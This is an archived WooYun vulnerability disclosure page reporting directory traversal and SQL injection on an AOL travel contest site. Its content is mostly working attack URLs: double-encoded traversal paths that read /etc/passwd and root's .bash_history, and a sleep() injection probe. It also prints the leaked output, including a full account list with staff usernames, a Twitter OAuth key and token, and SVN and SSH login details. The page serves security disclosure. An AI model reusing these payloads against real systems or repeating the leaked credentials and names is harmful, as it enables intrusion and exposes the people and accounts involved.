乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-11: 细节已通知厂商并且等待厂商处理中 2015-02-11: 厂商已经确认,细节仅向厂商公开 2015-02-21: 细节向核心白帽子及相关领域专家公开 2015-03-03: 细节向普通白帽子公开 2015-03-13: 细节向实习白帽子公开 2015-03-28: 细节向公众公开
Directory traversal(root) & SQL Injections on *.aol.com
Directory traversal:
http://contests.travel.aol.com/pages/aoltravelcontest/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc/passwd%2500.jpghttp://contests.travel.aol.com/pages/aoltravelcontest/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Froot%252F.bash_history%2500.jpg
/root/.bash_history is readable which means the user who init web server is root.SQL Injection:
http://contests.travel.aol.com/contests/showcontest/sleep(60)
read /etc/passwd
root:x:0:0:root:/root:/bin/kshbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnamed:x:25:25:Named:/var/named:/sbin/nologinmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bashnscd:x:28:28:NSCD Daemon:/:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinapache:x:48:506:Apache:/var/www:/bin/falseurchin:x:49:49:Urchin:/usr/local/urchin:/bin/falsesmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinwebalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologindistcache:x:94:94:Distcache:/:/sbin/nologindovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinrabbitmq:x:100:101:RabbitMQ messaging server:/var/lib/rabbitmq:/bin/bashnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologinrack:x:501:501::/home/rack:/bin/bashwebadmin:x:502:506::/home/webadmin:/bin/bashnagios:x:503:503::/home/nagios:/bin/bashlogstash:x:508:508::/usr/local/logstash:/bin/bashdkim:x:511:514::/usr/local/dkimproxy:/bin/bashsubmit:x:516:517::/home/submit:/bin/falseparents:x:534:534::/home/parents:/bin/falsesystems:x:600:600::/home/systems:/bin/kshjrisner:x:601:601::/home/jrisner:/bin/bash#vijeta:x:609:609::/home/vijeta:/bin/bashpriyanka:x:610:506::/home/priyanka:/bin/bashnvishal:x:613:615::/home/nvishal:/bin/bashpraveen:x:614:504::/home/praveen:/bin/bashcnikita:x:615:506::/home/cnikita:/bin/bashamitabh:x:622:623::/home/amitabh:/bin/kshvamshi:x:624:625::/home/vamshi:/bin/bashrnaresh:x:625:626::/home/rnaresh:/bin/bashahilash:x:626:627::/home/ahilash:/bin/bashabhilash:x:627:628::/home/abhilash:/bin/bashssatish:x:629:504::/home/ssatish:/bin/bashbharath:x:631:506::/home/bharath:/bin/bashphani:x:632:632::/home/phani:/bin/bashmandiv:x:633:506::/home/mandiv:/bin/bashbramesh:x:634:634::/home/bramesh:/bin/bashabhilashv:x:635:635::/home/abhilashv:/bin/bashdpraskumar:x:636:506::/home/dpraskumar:/bin/bashvramesh:x:637:637::/home/vramesh:/bin/bashsanantoniofun:x:643:643::/home/sanantoniofun:/bin/falsefirestone:x:644:644::/home/firestone:/bin/falsecorona:x:645:645::/home/corona:/bin/falsespectacle:x:646:646::/home/spectacle:/bin/falsetestproject:x:647:647::/home/testproject:/bin/falsejbl:x:649:649::/home/jbl:/bin/falsetheplanetisyourplayground:x:650:650::/home/theplanetisyourplayground:/bin/falsecoronasoccer:x:651:651::/home/coronasoccer:/bin/falsedhaval:x:653:504::/home/dhaval:/bin/bashkarthik:x:660:504::/home/karthik:/bin/bashcaterpillar:x:679:679::/home/caterpillar:/bin/falseharikrishna:x:638:504::/home/harikrishna:/bin/bash
part of /root/.bash_history
curl --request 'POST' 'https://stream.twitter.com/1.1/statuses/filter.json' --data 'track=twitter' --header 'Authorization: OAuth oauth_consumer_key="d8JyKzy79wRm8ux1EsPgfw", oauth_nonce="48952074a4990c8ed31401fbf754cfd4", oauth_signature="skLLUs%2Fnq3nhpgk5NQmTviepsHU%3D", oauth_signature_method="HMAC-SHA1", oauth_timestamp="1367919228", oauth_token="93573954-4BIJa8sv1qwAyKeuWXaNhF3QF92IUr8l1kNNM77ez", oauth_version="1.0"' --verbose > viveksvn --username mandiv co https://mytrtcom.svn.cloudforge.com/mtt/votigo_utils/trunk/facebooklistener /var/www/votigo_utils/facebooklistener/usr/bin/php /var/www/votigo_utils/tweetstream/monitor.twitter.process.pl --helpgrep "[email protected]" maillog*ssh [email protected]passwd mandiv
add filters
危害等级:高
漏洞Rank:11
确认时间:2015-02-11 23:44
暂无